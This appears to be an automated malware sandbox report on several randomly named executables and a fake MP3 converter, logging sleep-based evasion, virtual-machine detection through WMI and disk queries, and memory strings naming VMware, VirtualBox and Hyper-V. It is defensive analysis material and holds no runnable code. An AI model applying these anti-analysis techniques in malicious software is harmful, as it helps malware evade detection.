Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 8104	Thread sleep count: 9258 > 30
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 8104	Thread sleep time: -9258000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 2096	Thread sleep count: 83 > 30
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 2096	Thread sleep time: -83000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 7748	Thread sleep count: 156 > 30
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe TID: 7828	Thread sleep count: 47 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe TID: 7684	Thread sleep time: -58000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

File opened: PhysicalDrive0

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004DB1CB FindFirstFileExW,GetLastError,		7_2_004DB1CB
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,		7_2_0040B300

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH]'
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.000000000601B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb\<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: vmware
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2317597031.00000000014F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-S
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}q
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2190458786.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2188731263.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2218651908.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3136517564.000000000122E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416509107.0000000005FDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},P
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2317501058.0000000001251000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B23F6320pzIzG
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-V (guest)
Source: RegAsm.exe, 00000017.00000002.3132250995.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareh
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: svchost.exe, 00000003.00000002.2882896002.000001AC2362B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2181541626.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2181678034.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2414122665.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}E
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}A
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000003.2137721811.00000000018BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
